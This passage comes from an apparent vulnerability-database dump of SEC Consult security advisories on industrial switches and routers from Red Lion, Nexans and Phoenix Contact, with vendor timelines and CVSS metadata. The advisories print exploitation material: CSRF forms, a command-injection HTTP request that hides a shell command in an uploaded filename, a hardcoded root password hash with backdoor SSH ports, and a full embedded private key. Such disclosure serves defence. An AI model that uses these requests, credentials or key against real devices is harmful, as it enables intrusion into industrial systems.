type=\"hidden\" name=\"dns2\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n------------------------------------------------------------------------------- \n \n3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208 \nCSRF can be triggered on each endpoint as the whole web-interface does not \nimplement any protection mechanisms. Changing the hostname to \"SEC Consult\" can \nbe done with the following embedded HTML code: \n------------------------------------------------------------------------------- \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://$IP/system.cgi\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input type=\"hidden\" name=\"hostname\" value=\"SEC Consult\" /> \n<input type=\"hidden\" name=\"action\" value=\"chhost\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n------------------------------------------------------------------------------- \n \n4) Hidden OS Web-Shell Interface - CVE-2020-16204 \nThe endpoint \"/admin.cgi\" is not referenced within the whole web-interface and \nalso not documented in the manual. By browsing this endpoint, multiple actions \ncan be natively triggered: \n* Execute commands in context of the root user \n* Upload files \n* Download files \n* Change access rights \nAll other actions can be done via the command execution. The lack of CSRF \nprotections allows attackers to execute commands on the device by luring a \nuser on malicious web-pages. \n \n5) Known BusyBox Vulnerabilities \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n55\\;test.txt \n# \n------------------------------------------------------------------------------- \n \n6) Outdated Software Components \nBy analyzing the firmware a lot of components are found to be outdated: \n* BusyBox 1.0.1 \n* PHP/FI 2.0.1 \n* Dnsmasq 2.35 \n* Boa 0.93.15 \n \nVulnerable / tested versions: \n----------------------------- \nthe following firmware version has been tested: \n* Red Lion N-Tron 702-W / 2.0.26 \n* Red Lion N-Tron 702M12-W / 2.0.26 \n \n \nVendor contact timeline: \n------------------------ \n2020-03-09: Contacting vendor through support.emea@redlion.net; No answer. \n2020-03-17: Asked for status update; No answer. \n2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to \nthe list of recipients; No answer. \n2020-04-13: Requested support for coordination from CERT@VDE for the advisory. \nSent the advisory to the CERT. \n2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in- \nformed. \n2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that \nthey are waiting for an update of Red Lion. \n2020-08-20: Received CISA draft for an advisory from CERT@VDE. \n2020-08-28: Found the published advisory on CISA's website* which was released \non 2020-08-27. \n2020-09-02: Release of security advisory. \n \n* https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01 \n \nSolution: \n--------- \nUpgrade to newer hardware. \n \n \nWorkaround: \n----------- \nNone. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2020 \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159064/SA-20200902-0.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-20T16:51:21", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-20T00:00:00", "type": "packetstorm", "title": "Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547", "CVE-2015-9261", "CVE-2017-16544", "CVE-2022-32985"], "modified": "2022-06-20T00:00:00", "id": "PACKETSTORM:167552", "href": "https://packetstormsecurity.com/files/167552/Nexans-FTTO-GigaSwitch-Outdated-Components-Hardcoded-Backdoor.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20220615-0 > \n======================================================================= \ntitle: Hardcoded Backdoor User and Outdated Software Components \nproduct: Nexans FTTO GigaSwitch industrial/office switches HW version 5 \nvulnerable version: See \"Vulnerable / tested versions\" \nfixed version: V6.02N, V7.02 \nCVE number: CVE-2022-32985 \nimpact: High \nhomepage: https://www.nexans.com/ \nfound: 2020-05-25 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"As a global player in the cable industry, Nexans is behind the scenes \ndelivering the innovative services and resilient products that carry thousands \nof watts of energy and terabytes of data per second around the world. Millions \nof homes, cities, businesses are powered every day by Nexans\u2019 high-quality \nsustainable cabling solutions. We help our customers meet the challenges they \nface in the fields of energy infrastructure, energy resources, transport, \nbuildings, telecom and data, providing them with solutions and services for the \nmost complex cable applications in the most demanding environments.\" \n \nSource: https://www.nexans.com/company/What-we-do.html \n \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review of these \nproducts conducted by security professionals to identify and resolve all \nsecurity issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Outdated Vulnerable Software Components \nA static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that \nare used in the devices' firmware. Four of them were verified by using the \nMEDUSA scalable firmware runtime. \n \n \n2) Hardcoded Backdoor User (CVE-2022-32985) \nA hardcoded root user was found in \"/etc/passwd\". In combination with the \ninvoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port \n50201 and 50200 to login on a system shell. \n \n \nProof of concept: \n----------------- \n1) Outdated Vulnerable Software Components \nBased on an automated scan with the IoT Inspector (ONEKEY) the following third party \nsoftware packages were found to be outdated: \n \nFirmware version 6.02L: \nBusyBox 1.20.2 \nDropbear SSH 2012.55 \nGNU glibc 2.17 \nlighttpd 1.4.48 \nOpenSSL 1.0.2h \n \nThe following CVEs were verified with MEDUSA scalable firmware emulation: \n \n* CVE-2015-9261 (Unzip) \nThe crafted ZIP archive \"x_6170921383890712452.bin\" was taken from: \nhttps://www.openwall.com/lists/oss-security/2015/10/25/3 \nExecution inside the firmware emulation: \n \nbash-4.2# unzip x_6170921383890712452.bin \nArchive: x_6170921383890712452.bin \ninflating: ]3j\u00bdr\u00abIK-%Ix \ndo_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc \nepc = 0044bb28 in busybox[400000+99000] \nra = 0044b968 in busybox[400000+99000] \nSegmentation fault \n \n \n* CVE-2015-0235 (gethostbyname \"GHOST\" buffer overflow) \n \nPoC code was taken from: \nhttps://gist.github.com/dweinstein/66e6a088191ac0e8105c \n \n \n* CVE-2015-7547 (getaddrinfo buffer overflow) \n \nPoC code was taken from: \nhttps://github.com/fjserna/CVE-2015-7547 \n \n-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py & \n[1] 259 \n-bash-4.4# chroot /medusa_rootfs/ bin/bash \nbash-4.2# cd /medusa_exploits/ \nbash-4.2# ./cve-2015-7547_glibc_getaddrinfo \n[UDP] Total Data len recv 36 \n[UDP] Total Data len recv 36 \nConnected with 127.0.0.1:34356 \n[TCP] Total Data len recv 76 \n[TCP] Request1 len recv 36 \n[TCP] Request2 len recv 36 \nSegmentation fault \n \n \n* CVE-2017-16544 (shell autocompletion vulnerability) \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n \n2) Hardcoded Backdoor User (CVE-2022-32985) \nThe hardcoded system user, reachable via the dropbear SSH daemon was found due \nto multiple indications on the system. The undocumented root user itself was \ncontained in the \"passwd\" file: \n \nContent of the file \"/etc/passwd\". \n------------------------------------------------------------------------------- \nroot:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh \n[...] \n------------------------------------------------------------------------------- \n \nA suspicious port for the SSH daemon was chosen in the config file of dropbear: \n \nContent of the file \"/etc/init.d/dropbear\": \n------------------------------------------------------------------------------- \nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin \nDAEMON=/usr/sbin/dropbear \nNAME=dropbear \nDESC=\"Dropbear SSH server\" \nPIDFILE=/var/run/dropbear.pid \n \nDROPBEAR_PORT=\"50200 -p 50201\" \n[...] \n------------------------------------------------------------------------------- \n \nThis is invoked from \"/usr/lib/libnx_apl.so.0.0.0\", which can be seen in the \nfollowing pseudo-code: \n------------------------------------------------------------------------------- \nvoid dropbear_server_init(char param_1) \n \n{ \n__pid_t __pid; \nchar *pcVar1; \nint aiStack16 [2]; \n \n__pid = fork(); \nif (__pid == 0) { \n__pid = fork(); \nif (__pid != 0) { \n/* WARNING: Subroutine does not return */ \nexit(0); \n} \nif (param_1 == '\\0') { \npcVar1 = \"/etc/init.d/dropbear stop\"; \n} \nelse { \npcVar1 = \"/etc/init.d/dropbear start\"; <--- \n} \nexecl(\"/bin/sh\",\"sh\",&DAT_2cd91564,pcVar1,0); \n} \nelse { \nwaitpid(__pid,aiStack16,0); \n} \nreturn; \n} \n------------------------------------------------------------------------------- \n \n \nThis function is called if a specific command is issued in the CLI interface: \n------------------------------------------------------------------------------- \n[...] \niVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),\"ssh\",2); \nif (iVar6 != 0) { \nif (param_2 < 4) { \nnetbuf_fwd_sprintf(param_1,\"\\r\\n%%Error: Parameter missing\\r\\n\"); \niVar6 = shared_mem_get_addr(&var_shm); \niVar7 = shared_mem_get_addr(&var_shm); \nuVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a); \nshared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10); \nreturn; \n} \niVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"start\",1); \nif (iVar6 != 0) { \ndropbear_server_init('\\x01'); <--- \nnetbuf_fwd_sprintf(param_1,\"Starting dropbear...\\r\\n\"); \nreturn; \n} \niVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"stop\",1); \nif (iVar6 != 0) { \ndropbear_server_init('\\0'); <--- \nnetbuf_fwd_sprintf(param_1,\"Stopping dropbear...\\r\\n\"); \nreturn; \n} \nnetbuf_fwd_sprintf(param_1,\"Uknown dropbear command...\\r\\n\"); \nreturn; \n[...] \n------------------------------------------------------------------------------- \nThe mentioned library is used in the CLI program that is running on the device. \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware versions have been tested: \n \n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L \n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M \n \n \nVendor contact timeline: \n------------------------ \n2020-05-28: Contacting the vendor's PSIRT under the following link: \nhttp://www.nexans-ans.de/support/index.php?u=security_portal_sendmail \nNo answer. \n2020-06-08: Contacting vendor again via support.ans@nexans.com. Extended \ndeadline by 11 days. \n2020-06-16: Telephone call with Nexans representative. Security advisory was \nreceived. It will be reviewed to confirm the found issues. \n2020-06-26: Telephone call with Nexans representative. Nexans is working on the \nreported issues and will remove the dropbear daemon as first \nmeasure. \n2020-08-04: Vendor stated that a fix for the outdated software components will \nbe available in November. \n2020-11-12: Asked for status update. \n2020-11-16: Contact stated, that firmware test will need more time. Updates are \nestimated to be ready in Q1 of 2020. \n2020-11-20: Vendor confirmed Q1 as estimated disclosure date. \n2021-01-21: Asked for status update; Vendor stated that the release with all \nfixes is aimed to be published end of Q1. \n2021-03-09: Asked for status update. \n2021-03-17: Vendor stated that the firmware is in testing stage. The fixed \nfirmware will be released in May. \n2021-06-10: Asked for status update. \n2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and \nhomeschooling. The fixed firmware will be released end of August. \n2021-08-31: Asked for status update. \n2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021. \n2022-05-23: Informed vendor that the advisory will be released mid of June 2022. \n2022-05-24: Firmware V7.02 is available for download which fixes most outdated \ncomponents issues. \n2022-06-15: Release of security advisory. \n \n \nSolution: \n--------- \nThe vendor provides an updated firmware here: \nhttps://www.nexans-ans.de/support/firmware/ \n \nFirmware version V6.02N has the backdoor removed and was already published a while ago. \nVersion V7.02 also has the backdoor removed and most of the outdated software issues. \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: security-research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2022 \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167552/SA-20220615-0.txt"}, {"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "Phoenix Contact TC Router / TC Cloud Client Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6301", "CVE-2013-1813", "CVE-2014-9645", "CVE-2017-16544", "CVE-2020-9436", "CVE-2020-9435"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156729", "href": "https://packetstormsecurity.com/files/156729/Phoenix-Contact-TC-Router-TC-Cloud-Client-Command-Injection.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20200312-0 > \n======================================================================= \ntitle: Authenticated Command Injection \nproduct: Phoenix Contact TC Router & TC Cloud Client \nvulnerable version: <=2.05.3 & <=2.03.17 & <=1.03.17 \nfixed version: 2.05.4 & 2.03.18 & 1.03.18 \nCVE number: CVE-2020-9436, CVE-2020-9435 \nimpact: High \nhomepage: https://www.phoenixcontact.com/ \nfound: 2020-01-23 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Phoenix Contact is a globally present, Germany-based market leader. Our group \nis synonymous with future-oriented components, systems, and solutions in the \nfields of electrical engineering, electronics, and automation. A global network \nacross more than 100 countries and 15,000 employees ensure close proximity to \nour customers, which we believe is particularly important.\" \n \nSource: \nhttps://www.phoenixcontact.com/online/portal/pc?1dmy&urile=wcm%3apath%3a/pcen/web/corporate/company/subcategory_pages/Who_we_are/ \n \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review of these products \nconducted by security professionals to identify and resolve all security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.18.5 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scalable firmware runtime. \n \n2) Authenticated Command Injection (CVE-2020-9436) \nAn authenticated command injection vulnerability can be triggered by issuing a \nPOST request to the \"/cgi-bin/p/adm/cfg\" CGI program which is available on the \nweb interface. An attacker can abuse this vulnerability to compromise the \noperating system of the device. This issue was found by emulating the firmware \nof the device. \n \n3) Embedded Private X.509 Certificate (CVE-2020-9435) \nThe device contains a hardcoded certificate which can be used to run the web \nservice. This certificate is used for HTTPS (default server certificate for \nweb based configuration and management). \n \nImpersonation, man-in-the-middle or passive decryption attacks are possible. \nThese attacks allow an attacker to gain access to sensitive information like \nadmin credentials and use them in further attacks. \n \n \nProof of concept: \n----------------- \n1) Known BusyBox Vulnerabilities \nBusyBox version 1.18.5 contains multiple CVEs like: \nCVE-2016-6301, CVE-2014-9645 and CVE-2013-1813. \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n2) Authenticated Command Injection (CVE-2020-9436) \nAn authenticated command injection is possible via a crafted POST request. \n \nThe configuration upload form in the web-interface can be used to upload an XML \nconfiguration file. The filename of this XML file can be modified with an \ninterceptor proxy in order to inject system commands. The JavaScript code which \nis used to do client-side filtering can be bypassed in this way. Because of \nblacklisting of some characters, the ${IFS} command must be used for adding \nwhitespaces. \n \nRequest: \n------------------------------------------------------------------------------- \nPOST /cgi-bin/p/adm/cfg HTTP/1.1 \nHost: $IP \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: multipart/form-data; boundary=---------------------------10834433251208329385252513488 \nContent-Length: 724 \nAuthorization: Basic YWRtaW46YWRtaW4= \nConnection: close \nUpgrade-Insecure-Requests: 1 \nCache-Control: no-transform \n \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"exportmode\" \n \n0 \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"xmlmode\" \n \non \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"importmode\" \n \n0 \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"cfg_upload\"; filename=\"config.xml;ls${IFS}-la\" \nContent-Type: application/octet-stream \n \n \n \ntext \n \n-----------------------------10834433251208329385252513488 \nContent-Disposition: form-data; name=\"cfg_submit\" \n \n \n-----------------------------10834433251208329385252513488-- \n \n \n \n \nResponse from the web-server: \n \n \nHTTP/1.0 200 OK \nContent-Type: text/html \nCache-Control: no-cache \n \n<!DOCTYPE html> \n<html> \n<head> \n<meta charset=\"utf-8\"><meta http-equiv=\"Cache-Control\" content=\"no-cache\"> \n<style> \n/* CSS main */ \n \nbody \n{ \nfont-family: verdana, arial, helvetica, sans-serif; \nfont-size: 12px; \n} \n[...snip...] \n.TextWarning \n{ \nvertical-align: middle; \ncolor: #FF4000; \n} \n</style> \n<title>Configuration up-/download</title> \n</head> \n<body> \n<pre>xml parsed \nsetup new config done \ntotal 499 \ndrwxr-xr-x 2 root root 1024 Jan 28 2020 . \ndrwxr-xr-x 3 root root 1024 Jan 28 2020 .. \n-rwxr-xr-x 1 root root 5544 Jan 28 2020 atcmd \n-rwxr-xr-x 1 root root 9624 Jan 28 2020 basicsetup \n-rwxr-xr-x 1 root root 9012 Jan 28 2020 cfg \n-rwxr-xr-x 1 root root 7396 Jan 28 2020 conchk \n-rwxr-xr-x 1 root root 9128 Jan 28 2020 ddns \n-rwxr-xr-x 1 root root 14504 Jan 28 2020 dhcp \n-rwxr-xr-x 1 root root 4776 Jan 28 2020 dmesg \n-rwxr-xr-x 1 root root 6040 Jan 28 2020 edit_email \n-rwxr-xr-x 1 root root 6648 Jan 28 2020 edit_sms \n-rwxr-xr-x 1 root root 18288 Jan 28 2020 fw \n-rwxr-xr-x 1 root root 10560 Jan 28 2020 gprs \n-rwxr-xr-x 1 root root 12268 Jan 28 2020 gsm \n-rwxr-xr-x 1 root root 6784 Jan 28 2020 gsmlog \n-rwxr-xr-x 1 root root 11172 Jan 28 2020 io \n-rwxr-xr-x 1 root root 9812 Jan 28 2020 ipscert \n-rwxr-xr-x 1 root root 7604 Jan 28 2020 ipscon \n-rwxr-xr-x 1 root root 9928 Jan 28 2020 ipsike \n-rwxr-xr-x 1 root root 16728 Jan 28 2020 ipsset \n-rwxr-xr-x 1 root root 13808 Jan 28 2020 lanif \n-rwxr-xr-x 1 root root 5528 Jan 28 2020 leases \n-rwxr-xr-x 1 root root 6512 Jan 28 2020 log \n-rwxr-xr-x 1 root root 9656 Jan 28 2020 masqtbl \n-rwxr-xr-x 1 root root 5313 Jan 28 2020 mdmupl \n-rwxr-xr-x 1 root root 17912 Jan 28 2020 napt \n-rwxr-xr-x 1 root root 7704 Jan 28 2020 ovpnadvanced \n-rwxr-xr-x 1 root root 9656 Jan 28 2020 ovpncert \n-rwxr-xr-x 1 root root 6524 Jan 28 2020 ovpncon \n-rwxr-xr-x 1 root root 7856 Jan 28 2020 ovpnkey \n-rwxr-xr-x 1 root root 13012 Jan 28 2020 ovpnnapt \n-rwxr-xr-x 1 root root 19732 Jan 28 2020 ovpntunnel \n-rwxr-xr-x 1 root root 4760 Jan 28 2020 phonebook \n-rwxr-xr-x 1 root root 8284 Jan 28 2020 reboot \n-rwxr-xr-x 1 root root 5956 Jan 28 2020 routes \n-rwxr-xr-x 1 root root 10840 Jan 28 2020 rtc \n-rwxr-xr-x 1 root root 6928 Jan 28 2020 security \n-rwxr-xr-x 1 root root 17860 Jan 28 2020 sim \n-rwxr-xr-x 1 root root 7080 Jan 28 2020 sms \n-rwxr-xr-x 1 root root 7960 Jan 28 2020 smtp \n-rwxr-xr-x 1 root root 7048 Jan 28 2020 snmp \n-rwxr-xr-x 1 root root 5964 Jan 28 2020 socksrv \n-rwxr-xr-x 1 root root 9632 Jan 28 2020 sroute \n-rwxr-xr-x 1 root root 14668 Jan 28 2020 srvfw \n-rwxr-xr-x 1 root root 5456 Jan 28 2020 sshconfig \n-rwxr-xr-x 1 root root 11224 Jan 28 2020 sysconfig \n-rwxr-xr-x 1 root root 19996 Jan 28 2020 test \n-rwxr-xr-x 1 root root 4712 Jan 28 2020 update \n-rwxr-xr-x 1 root root 73 Jan 28 2020 upload \n-rwxr-xr-x 1 root root 30 Jan 28 2020 upremove \n-rwxr-xr-x 1 root root 7132 Jan 28 2020 user \n-rwxr-xr-x 1 root root 9672 Jan 28 2020 webcert \n-rwxr-xr-x 1 root root 10932 Jan 28 2020 webconfig \n</pre><pre>please reboot next</pre> \n</body> \n</html> \n \n \n \n3) Embedded Private X.509 Certificate (CVE-2020-9435) \nThe X.509 certificate was found on more than one device on Censys.io: \nSHA256 fingerprint: 8ca503b99f7eadc839747dfe612b256efcdc4e01bbf5757c0fb663e5a22836b8 \n \n-----BEGIN PRIVATE KEY----- \nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDm6jUy8KLYSPXo \nBiPx8LAlVcV4/6+pi+d4KzH6rvSoREYrjpalUMGbmoAdtbkr3qzvrLMP0s7tDOQB \nYfH40u1QvEWgN5iWGz+TONXbeg7p+ZjD63Cu+tu9Knj5ZoZ7zDVgOF2UaVVrQkpH \nCYXagnaplnQCbc1DiuvG8ha9ICaWuf7upNPiNpgdiGqrPwaqSCYhmi7K7Ej4dOpZ \n5Ji/LKxCGjokVpxlYgbJbNMtrBXdBjsVh8WMImxQe7g00CQhMIK6YfE7eOsXDTLP \nZDXIbf42emJ84kpU57ISI9ru1gmt7Jkl0EJlTwyMV/9NUXavpf15LnpKnkXK0Ez/ \nFu5erzVBAgMBAAECggEBAMP65yfSwAMc+UfxXjSK+JTXVQA60ZXuXYfJ8WM3dgIR \n4BQ7snOgNJGh8TZF82DeXpwUUO0PF/xswl7CCCIMssmg4N74EJLlkXGb/TWHRH0k \nD5nIixyXYEQOdhoGAAG18V82t4WsWIjt/CiKVoZ7z8ZjIRampl263B0/fjkJvnaQ \nzDzeF0Pnh9UAyjJQiec6wEFO2FUmU0XHgWOylzTUm+kWPg3de4SNA6kpSbOFKM4y \nxjdVUBK6ECT42EaJK5Ie3Fk3wKH11HQSYr2wRkC3VbN9XU4qUiOeQzNgAX5FRaBd \nEgyu1gkJvOOiKCmBB3hyoJA8eipyMoOtuWRJnO0aRBkCgYEA/qZrfYIUn/OA3iPe \n809eJoLsMI4ACOf46W4irskoOF1qRZ0WJZtbIY3vcsw+m+sKYZW8RyUrl9UoOhVT \nyYMNlhwWOyztvp+jembEiS1XaW9K5gfV7Z/+KAenGjd/MLvRB5GU9Yt0knyY5QwP \nrcQgE/Pgr19o++e2my+1etzxAD8CgYEA6COT0Am0ECGrIm+rR4VYlvMaT1V/RTpY \nWOfo7gExbyBj45vrTWKNGm1eAthOXwYLHA0Aan3bOrw3fprAmWrc1dhHC3+1Kjrn \nmqOv/rWzpN1WRbehNJd0VmcTI9M1XDONTbrs44cvN+Fpt88gxXFkDTRZs7onMPz5 \neOCNdGV6an8CgYB2l5htrfve9e8pBPmaxHarZsOKZUc83pN8Wq9KSSIzBcYtP1gG \nEZDiUpCWHOp3gIGoKqyxUW0426tNSYtoyGC2bMQpsOXTpdLjeSLEY9pWnt75u+J0 \nNNOPXukCe5//WSii5rjBlb2nTuGBohlXKoRp5mTYJ43j6uiO4ywYWPbfzwKBgQDN \nRMBswlfNt+fbAIGlMZ1/hSHrqv9qWMhMfW00ICv1Rt/tIS91c0Kwbqslut26Gt7y \nA/EtOXMEwfAUbIUIZD04fxF7cobg+8tWq41xnnxmuS2TYmgS2CYQTP7Yu+fASvmV \nFUhpfV1cfV99IJOq47SEFJmJWn9TSy7SG0YZ+a3AwwKBgEXATr+IAy04ASrtOf2Z \nySc5PbttVW1gMJd+BpyaXPa2qf7w/jELbOCfu4qe17qD2yufgyOzurikFfNayVbt \nxkOmyj24eKmwHKH+zmUy63i+kqiRqXUpypmFQzPRf7LQXYPZEv7IkVP/+ney4G9T \na0lM1ut6+1o9FLcqrnZk9uLY \n-----END PRIVATE KEY----- \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware version has been tested: \n \n* TC Router 3002T-4G ATT / 2.05.3 \n* TC Cloud Client 1002-TX/TX / 1.03.17 \n \nAccording to the vendor, the following devices are affected as well: \n \nArticle name Article number Affected versions \nTC ROUTER 3002T-4G 2702528 <= 2.05.3 \nTC ROUTER 3002T-4G 2702530 <= 2.05.3 \nTC ROUTER 2002T-3G 2702529 <= 2.05.3 \nTC ROUTER 2002T-3G 2702531 <= 2.05.3 \nTC ROUTER 3002T-4G VZW 2702532 <= 2.05.3 \nTC ROUTER 3002T-4G ATT 2702533 <= 2.05.3 \nTC CLOUD CLIENT 1002-4G 2702886 <= 2.03.17 \nTC CLOUD CLIENT 1002-4G VZW 2702887 <= 2.03.17 \nTC CLOUD CLIENT 1002-4G ATT 2702888 <= 2.03.17 \nTC CLOUD CLIENT 1002-TXTX 2702885 <= 1.03.17 \n \n \nVendor contact timeline: \n------------------------ \n2020-01-29: Sent advisory to vendor via PGP through psirt@phoenixcontact.com; \nVendor confirmed to receive the advisory. \n2020-02-26: Vendor stated that the vulnerabilities were confirmed and that a \nfirmware upgrade will be available in the next days. \n2020-02-29: Asked vendor for further affected devices and firmware versions. \n2020-03-02: Received information about further affected devices and firmware \nversions from vendor. The release of the new firmware version is \nplanned for the end of the week. CVE numbers were requested by \nthe vendor. \n2020-03-05: Found new firmware version numbers on the vendor's website. Asked \nthe vendor about the status regarding CVE 